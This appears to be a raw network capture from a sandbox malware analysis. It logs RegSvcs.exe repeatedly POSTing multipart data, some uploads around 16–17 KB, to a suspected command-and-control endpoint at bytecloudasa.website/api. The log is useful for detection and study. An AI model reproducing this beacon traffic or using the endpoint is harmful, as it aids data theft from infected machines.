Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dQiThjc4XWV9e5Op4S3uk6W6EP6HfDvC6MjEfQfBe8ZjmTLpbkBBIC5snEpArv919YMM4m896ae0ccGjeG4Pi5OuYqyXrerruyE5Zc0eboSlmltKzjngDakhqm5RSU2rbVCsmOE3Tw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5bc3ca5b90e-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=trr9kh5r4de7tum41egr85lamg; expires=Sat, 03 Feb 2024 20:43:58 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:19 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3ujZan%2FJjU8bVaJWDw2OEF3xx8L55LCoNxv22XqWPJlwYWcZcRompdgfy6GlqHlsD6gJvz7dTvxzpGK2cuiMKnZe2gthHXj%2BnDT1EH7exac57en9BSYqROQTX8E%2FHZZ8cilIv4JZcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5bd780a0eab-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=lp878hlr7f82jm7uekamrd4hdb; expires=Sat, 03 Feb 2024 20:43:58 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:19 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4U%2FPOGdgRAsMeTZixZ6QCRNmeBze6hIRAZRiWjeURCKt%2FF5UKhcl8N3axwNc4Px7oc%2Fmd14v4suArdX0Y8VBVulQ9CjQI%2BXqKmigl9QFExbHBUqQug2KuWanLD6vcHLuPCUI40VZHA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5c00f426570-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=qq8ul7sb9anv86bfgmat1cbc6r; expires=Sat, 03 Feb 2024 20:43:58 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:19 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QKUwiFXiyu0VMUqdhmEmLkp75VkhYc6T1OtexKCS3kiBrIs6H2t2xkrvZaJZPW3NKV4Gys%2Fl0nNji70qX7tZFcuxMokr8Ba2v%2BohzwUV55F%2Beei7iKZxh3O75y0Bnt6XEtmWIUxuJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5c0cce20a53-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=bvalmsluev9ae4oid4q8282dip; expires=Sat, 03 Feb 2024 20:43:58 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:19 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4rIOlHU30ERBTWVu3SZUd08eHonNjOt0w%2BysQ1AcMKpBqJcEvZgLAMoBxW62XLVlzY6y2hGEZzH3IZVD97Oz9YEn2TrIyF97x0tfJPexUAhLXLMkxUUAhWCX0VLY4BLxEXwDABCwSw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5c17a81670b-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=a0k01454bu4umvrp6o732am5cn; expires=Sat, 03 Feb 2024 20:43:59 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:20 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0YlcsKeo5GOjVjSs7%2Bd8PZfVGJkid2hIOdOHTF0TMRwFRIKGKfsOMmSoLQzImeQlOk3lbdnW1G3SRBvMtGv5pjAOWQ%2FQfqPX87hfNoCn83Lv%2F8E4PPI0JZ2iyiBlWiIlMttXY9YqPg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5c2ab9fb936-AMS
DNS

bytecloudasa.website

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

104.21.61.162

bytecloudasa.website

IN A

172.67.212.39
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=tna05epcfdqklvoqfvjga2lt7s; expires=Sat, 03 Feb 2024 20:43:59 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:20 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9sNbP4KVY0lLehZf0y%2BFCMUIqJewMiXKE4XzazUM0%2FcmdrI8bAjo5T0CNwjxWsSVljckQiWbf%2Fr0%2FCQZ8M9Y%2FnuOEhD3m2oYscl7EtMIlHAZoRq0QzWgNqCu7dY3On4D53GVuYwtZA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5c609496644-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 16485
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=upof40h0go42mmnt8jcbg1kbg0; expires=Sat, 03 Feb 2024 20:44:00 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:21 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XqYGjiH2pVpTbC9WsrG9%2BDNf4I52XuWf5q9wpBEo9Os5YhhYuIguiwuSZ56ufCKtG509hlhNEFvHTF8CiVHGWBt%2F9TVqp6NaHyowGSUzg4groFMa1Pyqpw5SZXkQKJx%2BZg%2FlrILLiw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5cb386cb91e-AMS
DNS

162.61.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.61.21.104.in-addr.arpa

IN PTR

Response
DNS

162.61.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.61.21.104.in-addr.arpa

IN PTR

Response
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=glgkmg5qs0qr69v27m3cdg4g78; expires=Sat, 03 Feb 2024 20:44:00 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:21 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tr7ruQWvSL9XgPwK0RBQffuE%2FOsjtzYXKLM8vu0NXi7%2FcP1JZLIpgtjN0ax%2FYGkERCXu1bJHBrUdAIpgszSYXV3YAXC1%2BzsdCw3j5xJSdS2JDI3P0Y%2FYCbQgP6NtTyqWhgScUqDGCg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5cccde66570-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=lltochaso0dfsfbgujtunq1tu9; expires=Sat, 03 Feb 2024 20:44:01 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:22 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5MNWSzKWb38sLSFdJ2huD3NLv%2FVMddI33wQvAjBhqZvx5vqm7ap80MWVMdtiQLGqv0utBMQgHqM2Iic2Doh0prAlQ9PG7Aal%2Bz1lJpj9irR3WJWbiIRLV2py0anR3gsleRjv9pRlpg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5d1f8eb1c7c-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=8npp90pas1vhhtmu1pp1285og7; expires=Sat, 03 Feb 2024 20:44:01 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:22 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F0lhgPjbCPj%2F0771lg1VQGB2rZtOvprs7Srqwwj2PANHjKkWF4I6b9mM8MCNBL379Kc5BJqm3IbmVHTY%2FssJfcebNd%2Fj0Pi0M8qK1Fr07BfNGf8Z0VdneJQeJ2bS76kTKHepZhMsLw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5d2ee79665b-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=2b50tqpf69popilalhvlfhtam6; expires=Sat, 03 Feb 2024 20:44:01 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:22 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CrJXe4geuUv3q%2FCOSiNrAurnzxgENyvQG7CcSoz2nN9rVokUXL9KFhceC4ntEqnzasO%2B%2Fq9C0lO2qMf%2Bvj5UOq6dmUhyuEcDBFVYI0Joq%2BoMM7qMNHSSEGP3gsc7O8mo1oZj%2FMpAzg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5d44f6c0b3c-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=uqj8vk2g1uecg6n5epvtnvil78; expires=Sat, 03 Feb 2024 20:44:01 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:22 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iJJXrgBK%2BBZ8YlF7oWKI5KcMdvmZvPmjFFqsbVeZ1ezuDsEdqfOjNlJoNRCxUD6I16T4hCqNIy%2BHSC8S%2FI%2BPjIhCXh0%2B4GRjHFz%2FR5nTRqkEhp2Gkofm3RZciDgTOj9Z02hcTFfeuw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5d55a75b794-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 17448
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=vvqlj7s1gjj7k2pidble537e9q; expires=Sat, 03 Feb 2024 20:44:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EQe2VgTQGWSjdSv6NN0QNcJOocO6VpC2M5T6dEUoTNKcJ%2BdYk%2BQDdychYXM6Kz1gricoS%2BN9SC9OupDLPy3XQJE%2BzQoVhIMLh38%2Be7jZYxYbvCHflwgax86uthuDT7ZV%2BIxE96xR4w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5d6fa516570-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=dk18hc7sq8eg10eo8ri54rqc2i; expires=Sat, 03 Feb 2024 20:44:04 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sun, 10 Dec 2023 02:57:25 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r8ALOjctnqQYarnJHE15dGQoZu1vuIf0L49OXqSsx6iVusXwhQUOUxV6nMO84AJWeWQ1A96OPxpUQ%2BJXRTszf4%2FoRfBF4g2FuMZ3HedKRQ51ooFkjgcgvwoTQew33HDid%2B6oVIBj5A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8143d5e39e220e9c-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=dcFbv5XMJoDCuQj5v2PgSlhz.E1xZXBl7fViP15evrk-1696993032-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 02:57:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
